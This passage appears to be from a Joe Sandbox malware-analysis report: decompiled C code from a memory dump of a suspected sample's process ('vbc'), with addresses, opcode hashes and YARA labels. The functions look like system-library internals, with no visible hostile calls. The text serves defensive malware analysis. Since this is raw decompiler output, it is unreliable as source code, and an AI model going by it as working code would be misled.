																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E015B922A(_t99);
										_t64 = E015D7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01688B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x16a86c0; // 0x11507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x16a86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x16a86bc;
													_t87 = 0x16a86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E015B9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x16a86c4;
												_t87 = 0x16a86c0;
												L27:
												E015E9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0160D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x16a5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x16a538c = _t51;
						goto L6;
					}
				}
			}




















                                                  0x015b9082
                                                  0x015b9083
                                                  0x015b9084
                                                  0x015b9085
                                                  0x015b9087
                                                  0x015b9096
                                                  0x015b9098
                                                  0x015b9098
                                                  0x015b909e
                                                  0x015b90a8
                                                  0x015b90e7
                                                  0x015b90e7
                                                  0x015b90aa
                                                  0x015b90b0
                                                  0x015b90b7
                                                  0x015b90bd
                                                  0x015b90dd
                                                  0x015b90e6
                                                  0x015b90bf
                                                  0x015b90bf
                                                  0x015b90c7
                                                  0x015b90cf
                                                  0x015b90f1
                                                  0x015b90f2
                                                  0x015b90f4
                                                  0x015b90f5
                                                  0x015b90f6
                                                  0x015b90f7
                                                  0x015b90f8
                                                  0x015b90f9
                                                  0x015b90fa
                                                  0x015b90fb
                                                  0x015b90fc
                                                  0x015b90fd
                                                  0x015b90fe
                                                  0x015b90ff
                                                  0x015b9100
                                                  0x015b9102
                                                  0x015b9107
                                                  0x015b910c
                                                  0x015b9110
                                                  0x015b9113
                                                  0x015b9115
                                                  0x015b9136
                                                  0x015b913f
                                                  0x015b9143
                                                  0x016137e4
                                                  0x016137e4
                                                  0x015b9117
                                                  0x015b9117
                                                  0x015b911d
                                                  0x00000000
                                                  0x015b911f
                                                  0x015b911f
                                                  0x015b9125
                                                  0x00000000
                                                  0x015b9127
                                                  0x015b912d
                                                  0x015b9130
                                                  0x015b9134
                                                  0x015b9158
                                                  0x015b915d
                                                  0x015b9161
                                                  0x015b9168
                                                  0x01613715
                                                  0x015b916e
                                                  0x015b916e
                                                  0x015b9175
                                                  0x015b9177
                                                  0x015b917e
                                                  0x015b917f
                                                  0x015b9182
                                                  0x015b9182
                                                  0x015b9187
                                                  0x015b9187
                                                  0x015b918a
                                                  0x015b918d
                                                  0x015b918f
                                                  0x015b9192
                                                  0x015b9195
                                                  0x015b9198
                                                  0x015b9198
                                                  0x015b9198
                                                  0x015b919a
                                                  0x00000000
                                                  0x00000000
                                                  0x0161371f
                                                  0x01613721
                                                  0x01613727
                                                  0x0161372f
                                                  0x01613733
                                                  0x01613735
                                                  0x01613738
                                                  0x0161373b
                                                  0x0161373d
                                                  0x01613740
                                                  0x00000000
                                                  0x01613746
                                                  0x01613746
                                                  0x01613749
                                                  0x00000000
                                                  0x0161374f
                                                  0x0161374f
                                                  0x01613751
                                                  0x01613757
                                                  0x01613759
                                                  0x0161375c
                                                  0x0161375c
                                                  0x0161375e
                                                  0x0161375e
                                                  0x01613761
                                                  0x01613764
                                                  0x00000000
                                                  0x00000000
                                                  0x01613766
                                                  0x01613768
                                                  0x016137a3
                                                  0x016137a3
                                                  0x016137a5
                                                  0x016137a7
                                                  0x016137ad
                                                  0x016137b0
                                                  0x016137b2
                                                  0x016137bc
                                                  0x016137c2
                                                  0x016137c2
                                                  0x016137b2
                                                  0x015b9187
                                                  0x015b9187
                                                  0x015b918a
                                                  0x015b918d
                                                  0x015b918f
                                                  0x015b9192
                                                  0x015b9195
                                                  0x00000000
                                                  0x015b9195
                                                  0x00000000
                                                  0x0161376a
                                                  0x0161376a
                                                  0x0161376a
                                                  0x0161376c
                                                  0x0161376c
                                                  0x0161376f
                                                  0x01613775
                                                  0x00000000
                                                  0x00000000
                                                  0x01613777
                                                  0x01613779
                                                  0x01613782
                                                  0x01613787
                                                  0x01613789
                                                  0x01613790
                                                  0x01613790
                                                  0x0161378b
                                                  0x0161378b
                                                  0x0161378b
                                                  0x01613792
                                                  0x01613795
                                                  0x00000000
                                                  0x01613795
                                                  0x00000000
                                                  0x01613779
                                                  0x01613798
                                                  0x00000000
                                                  0x01613798
                                                  0x00000000
                                                  0x01613768
                                                  0x0161379b
                                                  0x0161379b
                                                  0x01613751
                                                  0x01613749
                                                  0x00000000
                                                  0x01613740
                                                  0x015b91a0
                                                  0x015b91a3
                                                  0x015b91a9
                                                  0x015b91b0
                                                  0x00000000
                                                  0x015b91b0
                                                  0x015b9187
                                                  0x015b91b4
                                                  0x015b91b4
                                                  0x015b91bb
                                                  0x015b91c0
                                                  0x015b91c5
                                                  0x015b91c7
                                                  0x016137da
                                                  0x015b91cd
                                                  0x015b91cd
                                                  0x015b91cd
                                                  0x015b91d2
                                                  0x015b91d5
                                                  0x015b9239
                                                  0x015b9239
                                                  0x015b91d7
                                                  0x015b91db
                                                  0x015b91e1
                                                  0x015b91e7
                                                  0x015b91fd
                                                  0x015b9203
                                                  0x015b921e
                                                  0x015b9223
                                                  0x00000000
                                                  0x015b9205
                                                  0x015b9205
                                                  0x015b9208
                                                  0x015b920c
                                                  0x015b9214
                                                  0x015b9214
                                                  0x015b920c
                                                  0x015b91e9
                                                  0x015b91e9
                                                  0x015b91ee
                                                  0x015b91f3
                                                  0x015b91f3
                                                  0x015b91f3
                                                  0x015b91e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015b9134
                                                  0x015b9125
                                                  0x015b911d
                                                  0x015b914e
                                                  0x015b90d1
                                                  0x015b90d1
                                                  0x015b90d3
                                                  0x015b90d6
                                                  0x015b90d8
                                                  0x00000000
                                                  0x015b90d8
                                                  0x015b90cf

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 86731e7115dd280d6ef54a1545ee9d91c1834d396af8e188711a153244be5193
                                                  • Instruction ID: f7a5cc1ebc0827428431659cb07af16e417aa34ec098d67de8cca259bfefb37b
                                                  • Opcode Fuzzy Hash: 86731e7115dd280d6ef54a1545ee9d91c1834d396af8e188711a153244be5193
                                                  • Instruction Fuzzy Hash: 0001F4B29016098FC3258F08DC80B16BBA9FF82324F21402AE601CF692D370DC41CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0164C450 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E0164C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E015F9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E015F95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E015F95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E015F95D0();
				return L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                  0x0164c458
                                                  0x0164c45d
                                                  0x0164c466
                                                  0x0164c468
                                                  0x0164c469
                                                  0x0164c46a
                                                  0x0164c46b
                                                  0x0164c46e
                                                  0x0164c46f
                                                  0x0164c471
                                                  0x0164c476
                                                  0x0164c476
                                                  0x0164c47c
                                                  0x0164c47e
                                                  0x0164c480
                                                  0x0164c480
                                                  0x0164c483
                                                  0x0164c484
                                                  0x0164c486
                                                  0x0164c488
                                                  0x0164c48f
                                                  0x0164c491
                                                  0x0164c493
                                                  0x0164c493
                                                  0x0164c48f
                                                  0x0164c498
                                                  0x0164c49e
                                                  0x0164c4ad
                                                  0x0164c4ad
                                                  0x0164c4b2
                                                  0x0164c4b4
                                                  0x0164c4cd

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                  • Instruction ID: 859cd5150fda63e6fd94e610c518b725d53ca882d7b8d30747218ae9cd829fc4
                                                  • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                  • Instruction Fuzzy Hash: 99019272141907BFE721AF69CD84E62FB6DFFA4394F014529F21446660CB21ACA1CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01684015 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E01684015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E015D2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E015D2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x16a86ac);
					E015BF900(0x16a86d4, _t28);
					E015CFFB0(0x16a86ac, _t28, 0x16a86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E015CFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                  0x0168401a
                                                  0x0168401e
                                                  0x01684023
                                                  0x01684028
                                                  0x01684029
                                                  0x0168402b
                                                  0x0168402f
                                                  0x01684043
                                                  0x01684046
                                                  0x01684051
                                                  0x01684057
                                                  0x0168405f
                                                  0x01684062
                                                  0x01684067
                                                  0x0168406f
                                                  0x0168407c
                                                  0x0168407c
                                                  0x0168408c
                                                  0x0168408c
                                                  0x01684097

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ecac0a4b96c889af464581fc7664b07a159fc1f0da24d68f3eb09d9762d71940
                                                  • Instruction ID: e81bb3ea4d6e74ec3464d67aa760b3e15ede0a4795853f7aaa9bc7a6bdaf4bf3
                                                  • Opcode Fuzzy Hash: ecac0a4b96c889af464581fc7664b07a159fc1f0da24d68f3eb09d9762d71940
                                                  • Instruction Fuzzy Hash: 39018F722419477FD221AF7DCD80E13F7ACFF99660B00022AB5188BA11CB24EC12CBE4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0167138A Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E0167138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x16ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E015FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E015D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                  0x0167138a
                                                  0x0167138a
                                                  0x01671399
                                                  0x016713a3
                                                  0x016713a8
                                                  0x016713aa
                                                  0x016713b5
                                                  0x016713bb
                                                  0x016713c3
                                                  0x016713c6
                                                  0x016713c9
                                                  0x016713d4
                                                  0x016713e6
                                                  0x016713d6
                                                  0x016713df
                                                  0x016713df
                                                  0x016713f1
                                                  0x016713f2
                                                  0x016713f4
                                                  0x016713f9
                                                  0x0167140e

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb301b083d8cf990c368a8dbac02a625b3e5584c45bfa0fd970f772273c67f53
                                                  • Instruction ID: d34bda85d06400be54232068704b892e66360a0663a5759d336f90914a9ec6b2
                                                  • Opcode Fuzzy Hash: cb301b083d8cf990c368a8dbac02a625b3e5584c45bfa0fd970f772273c67f53
                                                  • Instruction Fuzzy Hash: B8015271A00219AFDB14EFA9D841FAEBBB8FF85710F40405AB905EB380D6749E15CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016714FB Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E016714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x16ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E015FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E015D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                  0x016714fb
                                                  0x016714fb
                                                  0x0167150a
                                                  0x01671514
                                                  0x01671519
                                                  0x0167151b
                                                  0x01671526
                                                  0x0167152c
                                                  0x01671534
                                                  0x01671537
                                                  0x0167153a
                                                  0x01671545
                                                  0x01671557
                                                  0x01671547
                                                  0x01671550
                                                  0x01671550
                                                  0x01671562
                                                  0x01671563
                                                  0x01671565
                                                  0x0167156a
                                                  0x0167157f

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb3b2b4a453fa0fef9feecfb427e41b2726f305b671666822ea96dc41756004d
                                                  • Instruction ID: 9c6640f26fe00d681b0d530a9ffb3e34c35c491d1db69efe1d325c3a34c3e8fb
                                                  • Opcode Fuzzy Hash: bb3b2b4a453fa0fef9feecfb427e41b2726f305b671666822ea96dc41756004d
                                                  • Instruction Fuzzy Hash: E8019271A00249AFDB14EFA9D841EAEBBB8FF85700F40405AF905EB380D670DA50CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B58EC Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E015B58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x16ad360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1595c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E015B5943() != 0 &&  *0x16a5320 > 5) {
					E01637B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01637B5E( &_v28, _t28);
					_t11 = E01637B9C(0x16a5320, 0x159bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E015FB640(_t11, _t17, _v8 ^ _t29, 0x159bf15, _t27, _t28);
			}















                                                  0x015b58fb
                                                  0x015b58fe
                                                  0x015b5906
                                                  0x015b590a
                                                  0x015b593c
                                                  0x015b593c
                                                  0x015b590c
                                                  0x015b590c
                                                  0x015b5911
                                                  0x00000000
                                                  0x015b5913
                                                  0x015b5913
                                                  0x015b5913
                                                  0x015b5911
                                                  0x015b591d
                                                  0x01611035
                                                  0x0161103c
                                                  0x0161103f
                                                  0x01611056
                                                  0x01611056
                                                  0x015b593b

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49c5834b31688e7dbb0a28ef043016c7d456407731c08c5244c3abf1c2a67382
                                                  • Instruction ID: 6167c2c56bf79e2977effc17d817a079855de8279dee9f3f41b89a2c1fbc3e05
                                                  • Opcode Fuzzy Hash: 49c5834b31688e7dbb0a28ef043016c7d456407731c08c5244c3abf1c2a67382
                                                  • Instruction Fuzzy Hash: E1018F71A201059BDB18EF69DC409AE77F9FB92530F9400A99A169F244FF21ED02CA95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01681074 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E01681074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0168165E(__ebx, 0x16a8ae4, (__edx -  *0x16a8b04 >> 0x14) + (__edx -  *0x16a8b04 >> 0x14), __edi, __ecx, (__edx -  *0x16a8b04 >> 0x14) + (__edx -  *0x16a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0167AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E015D7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0166FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                  0x01681074
                                                  0x01681080
                                                  0x01681082
                                                  0x0168108a
                                                  0x0168108f
                                                  0x01681093
                                                  0x016810ab
                                                  0x016810ab
                                                  0x016810c3
                                                  0x016810cf
                                                  0x016810e1
                                                  0x016810d1
                                                  0x016810da
                                                  0x016810da
                                                  0x016810e9
                                                  0x016810f5
                                                  0x016810f5
                                                  0x016810fe

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c03fbaad77077fc920a84db2648de58975aadaf1da85c386bbfbd7705b869d08
                                                  • Instruction ID: aeb38edd2fffa1fd8332b783dad0cca2725151da8788162bf396a7fd283a5a8f
                                                  • Opcode Fuzzy Hash: c03fbaad77077fc920a84db2648de58975aadaf1da85c386bbfbd7705b869d08
                                                  • Instruction Fuzzy Hash: 7E012472604742AFC710EF68CD00B1A7BEABB85214F048629F98583390EF34E942CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015CB02A Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015CB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E015D7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01637016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                  0x015cb037
                                                  0x015cb039
                                                  0x015cb03b
                                                  0x015cb040
                                                  0x0161a60e
                                                  0x00000000
                                                  0x00000000
                                                  0x0161a61d
                                                  0x015cb04b
                                                  0x015cb04e
                                                  0x0161a627
                                                  0x0161a634
                                                  0x00000000
                                                  0x00000000
                                                  0x0161a641
                                                  0x0161a653
                                                  0x0161a643
                                                  0x0161a64c
                                                  0x0161a64c
                                                  0x0161a65b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0161a66c
                                                  0x015cb057
                                                  0x015cb057
                                                  0x015cb057
                                                  0x015cb046
                                                  0x015cb046
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                  • Instruction ID: cd9be762c18ee79c4ed30f4dba0c6c9c7327880eabc1a49f54cf24f54b45861f
                                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                  • Instruction Fuzzy Hash: DD0184722015C0DFE3228B9CC944F6A7BD8FB85B94F0904A5FA15CF655D728DC40C665
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0166FE3F Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E0166FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x16ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E015FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E015D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                  0x0166fe3f
                                                  0x0166fe3f
                                                  0x0166fe4e
                                                  0x0166fe58
                                                  0x0166fe5d
                                                  0x0166fe5f
                                                  0x0166fe6a
                                                  0x0166fe72
                                                  0x0166fe75
                                                  0x0166fe78
                                                  0x0166fe83
                                                  0x0166fe95
                                                  0x0166fe85
                                                  0x0166fe8e
                                                  0x0166fe8e
                                                  0x0166fea0
                                                  0x0166fea1
                                                  0x0166fea3
                                                  0x0166fea8
                                                  0x0166febd

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 012887e6baa763dfc601b5c88ce5ca8ece5430b9669f80a3ae50a88051cc419e
                                                  • Instruction ID: 6b3be31df1dabfbb75ae98c04159946da14fc1448984c5e204f11197efbd0405
                                                  • Opcode Fuzzy Hash: 012887e6baa763dfc601b5c88ce5ca8ece5430b9669f80a3ae50a88051cc419e
                                                  • Instruction Fuzzy Hash: 2D018871E00209ABDB14DFA9DC45FAEBBB8EF84704F00406AF9009B381DA709911C795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0166FEC0 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E0166FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x16ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E015FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E015D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                  0x0166fec0
                                                  0x0166fec0
                                                  0x0166fecf
                                                  0x0166fed9
                                                  0x0166fede
                                                  0x0166fee0
                                                  0x0166feeb
                                                  0x0166fef3
                                                  0x0166fef6
                                                  0x0166fef9
                                                  0x0166ff04
                                                  0x0166ff16
                                                  0x0166ff06
                                                  0x0166ff0f
                                                  0x0166ff0f
                                                  0x0166ff21
                                                  0x0166ff22
                                                  0x0166ff24
                                                  0x0166ff29
                                                  0x0166ff3e

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
